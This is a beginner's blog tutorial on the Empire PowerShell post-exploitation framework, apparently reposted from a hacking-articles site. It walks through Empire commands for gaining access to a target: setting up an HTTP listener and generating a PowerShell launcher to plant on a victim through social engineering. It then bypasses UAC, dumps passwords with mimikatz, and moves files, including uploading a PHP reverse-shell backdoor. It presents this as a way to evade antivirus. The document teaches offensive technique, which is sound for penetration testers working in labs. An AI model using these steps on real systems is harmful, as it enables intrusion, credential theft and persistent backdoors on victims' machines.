Hacking with Empire – PowerShell Post-Exploitation Agent
Hello everyone and welcome to this beginner’s guide to Empire. According to their official website:
“Empire is a pure PowerShell post-exploitation agent” built on cryptologically-secure communications and a flexible architecture.
Empire – PowerShell post-exploitation agent
Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.”
In this tutorial we will be covering everything you need to know about this software, straight from installation to getting a shell and even getting admin access without letting the antivirus know!
Before starting with the action you need to know these four things:
Listener: listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker’s computer.
Stager: A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.
Agent: An agent is a program that maintains a connection between your computer and the compromised host.
Module: These are what execute our malicious commands, which can harvest credentials and escalate our privileges as mentioned above.
Methodology:
- Creating a listener.
- Starting a listener.
- Launching a PowerShell code using launcher.
- Executing code on victim’s machine.
- Interacting with agent.
- Executing various modules.
- Bypassing UAC to get admin access.
To get started, clone the following git repo using git clone:
| 1 | git clone https://github.com/EmpireProject/Empire.git |
Now move into the installed directory and run install.sh file.
Wait for it to complete installation. This might take a few seconds. It will prompt you for a password, enter anything.
In my case, my password was toor.
Once the installation is done, move back a directory and run empire using ./empire
Help command opens up all the essential options required initially.
As our methodology states, we will be creating a listener for our local machine first.
| 1 | Listeners |
It will say that “no listeners are currently active” but don’t worry, we are into the listener interface now.
| 1 | uselistener http |
Creates a listener on the local port 80. If port 80 is already busy by a service like apache, please make sure you stop that service.
Note: Whenever you double click on tab, all the available options will appear, just like in all of Linux.
Hence, uselistener <tab><tab> shows me all the listenersand so on like that.
| 1 | execute |
Above command will execute the listener. Then go back and use powsershell listener as shown in the below image.
| 1 | launcher powershell http |
All we have to do now is copy this powershell code into victim’s command prompt using social engineering. Let’s assume we have access of victim’s command prompt and we copied our code into his cmd.
As soon as you hit enter you will see an agent being active on your empire screen. After executing the malicious powershell code, go back again to the main menu with the command:
| 1 | main |
Here you will see 1 agent active.
| 1 2 | agents interact <agent name> |
You can also rename the agent’s name to a rather simple one using the rename command.
| 1 | rename <agent name> raajpc |
Now, to get an admin shell, run bypassuac command with help of following command.
| 1 | bypassuac http |
List command can be used anywhere to see the list in current interface. Here it displayed a list of agents in agent’s interface.
| 1 | list |
Let’s rename the agent’s name to a rather simpler one, once again.
| 1 | rename <admin agent name> adminraj |
Now you can see that we got a new admin shell using bypassuac and we renamed it to adminraj
Let’s interact with adminraj now.
| 1 | interact adminraj |
<tab><tab>helps us view all the options in the shell. There are several options which is quite helpful to for post exploitation. Such as info, job, list and etc as shown in the image.
Info: for all the basic details like IP, nonce, jitter, integrity etc.
Let’s try and run mimikatz to get the password of the user. Since, mimikatz won’t run on a normal guest user shell and will only run on admin shell; this also proves that we have to achieve admin access so that we can use mimikatz.
Hmmmm!! And the password is “123”for user raj.
| 1 | creds |
Above command will dump the credentials or password of any user in both plaintext and its hash as well.
Another important command is the shell command.
To use the shell of the victim to run proper microsoft windows commands, we use this feature.
Eg: one such window’s cmd only command is netstat
| 1 | shell netstat -ano |
As expected, it showed us all the ports in work currently on the machine!
Now, since the default shell directory in windows is “C:/windows/system32”; let’s try and move into another directory and try to download some file from there and also we can upload something at that location, for example we can upload a backdoor.!
| 1 2 3 | shell cd C:\Users\raj\Desktop shell dir download 6.png |
Above command will download an image called 6.png from the window’s desktop to the “downloads directory of Empire”
| 1 | upload /root/Desktop/revshell.php |
Here we can upload any backdoor, with help of above command we are uploading a php backdoor from Kali’s desktop to victim’s desktop and we can even invoke this file since we have the shell access!
This is where the downloaded files will go:
| 1 | Empire directory/downloads/<agent name>/<agent shell location>ls |
| 1 | shell dir |
Above command proves that we indeed have uploaded revshell.php
And there it is! Revshell.php on the desktop of victim’s machine which our backdoor file.
Happy Hacking!!!
Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here
Source: www.hackingarticles.in
Reviewed by Anonymous
on
11:42 PM
Rating:
